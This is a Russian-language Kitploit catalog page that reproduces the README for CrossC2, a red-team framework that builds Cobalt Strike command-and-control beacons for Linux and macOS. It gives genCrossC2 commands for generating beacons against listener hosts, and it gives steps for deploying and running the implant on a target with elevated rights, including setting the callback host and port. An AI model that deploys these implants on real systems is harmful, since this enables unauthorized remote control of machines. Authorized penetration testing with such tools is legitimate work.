Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CrossC2 — сгенерировать кроссплатформенную полезную нагрузку CobaltStrike | Kitploit
Инструменты/GitHubGitHub/gloxec/crossc2
Фреймворки для пентестаФреймворки для эксплойтовГенерация полезной нагрузкиПост-эксплуатацияКомандование и УправлениеRed TeamingРазработка Полезной Нагрузки
GitHubgloxec/crossc2

CrossC2

сгенерировать кроссплатформенную полезную нагрузку CobaltStrike

Репозиторий
2.6k37453 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Фреймворк CrossC2

Linux macOS GitHub issues-closed Release Downloads

CrossC2 Logo

README | 中文文档 | README_FULL | 中文完整文档

Поддержка CobaltStrike

Поддерживает оценку безопасности CobaltStrike на других платформах (Linux/MacOS/...), а также включает поддержку разработки модулей пост-эксплуатации Unix

CS3.14 (исправления ошибок)CS4.0CS4.X (4.1~4.8)
Ветка Master✅
Ветка cs4.0✅
Ветка cs4.1✅
Страница релиза <= v2.1✅
Страница релиза >= v2.2✅

2023-07-31 16.56.51

Использование

  1. Загрузка

Загрузите CrossC2.cna genCrossC2 CrossC2Kit, измените конфигурацию CrossC2.cna

  1. Создайте слушатель и скопируйте ключ
  • Создайте слушатель windows/beacon_https/reverse_https
  • Скопируйте .cobaltstrike.beacon_keys из каталога teamserver в локальный
  1. Расширение функционала
  • Добавьте CrossC2Kit_Loader.cna, включающий загрузку в память и другие функции
  • В версии cs4.x отсутствуют функции управления файлами и списка процессов, вы должны использовать этот Loader для перезапуска
  1. Генерация beacon

Используйте функцию GUI, предоставленную cli или cna, для генерации beacon по умолчанию

genCrossC2 <listener-ip/domain> <listener-port> <beacon_keys> <rebind_library;config.ini;c2profile.profile> <target_platform> <target_arch>

пример:

root@kitploit:~
1. read BEACON_KEY from current path and generate BEACON of default C2Profile traffic protocol
    genCrossC2 127.0.0.1 5555 null null Linux x64 beacon.out
     
2. specify the BEACON of the custom protocol dynamic library
    genCrossC2 127.0.0.1 5555 .cobaltstrike.beacon_keys c2profile.so MacOS x64 beacon.out

3. specify the C2Profile that needs to be automatically parsed
    genCrossC2 www.example.com 443 .cobaltstrike.beacon_keys ";;c2profile.profile" Linux x64 beacon.out

Более продвинутые конфигурации можно найти в документации: 📄Справочник

  1. Запуск beacon
  • Запустите сценарий однокнопочного онлайн-подключения, созданный плагином CrossC2, на целевой системе.
  • После загрузки beacon на целевую машину для выполнения с расширенными правами
  • Установите рабочий каталог для beacon и выполните: export CCPATH=/opt/ && /tmp/c2
  • Временно укажите библиотеку протоколов для beacon и выполните: /tmp/c2 /tmp/c2-rebind.so
  • Временно установите C2-конфигурацию для beacon: export CCHOST=127.0.0.1 && export CCPORT=443 && /tmp/c2
  • Установите DEBUG для просмотра статуса онлайн beacon: export CCDEBUG=1 && /tmp/c2

CrossC2Kit

CrossC2Kit: https://github.com/CrossC2/CrossC2Kit

CrossC2Kit — это расширение для инфильтрации на платформе Unix, полученное из CrossC2. Использует открытый скриптовый движок Aggressor Script. Он может использоваться для создания автоматизации, имитирующей рабочие процессы Red Team, и расширения клиента CobaltStrike.

CrossC2Kit унаследован от оригинальных функций CobaltStrike, поэтому синтаксис разработки и написания по-прежнему ссылается на официальную документацию: https://trial.cobaltstrike.com/aggressor-script/index.html

Но он имеет некоторые расширения API поверх CrossC2 для управления beacon на платформе Unix

API: 📄Справочник

Demo: CrossC2_action2

Примечание

Только для внутреннего использования предприятиями и организациями. Этот фреймворк имеет некоторую степень нестабильности. Непрофессионалам запрещено его использовать. Никто не должен использовать его в незаконных целях или для извлечения прибыли. Кроме того, публикация несанкционированных модифицированных версий также запрещена, иначе вы несете юридическую ответственность.

Планы

  1. Поддержка обратного подключения через http-proxy (с аутентификацией) и socks-прокси
  2. node beacon? (Одиночный тип узла, может размещать другие beacon без зависимости от teamserver)
  3. Поддержка обратного shell на стороне Linux и MacOS (so/dylib) и производные функции внедрения процессов

Благодарности

Спасибо @Emma за логотип, разработанный для CrossC2, который выполнен в стиле серий Armitage и CobaltStrike

Скачать инструмент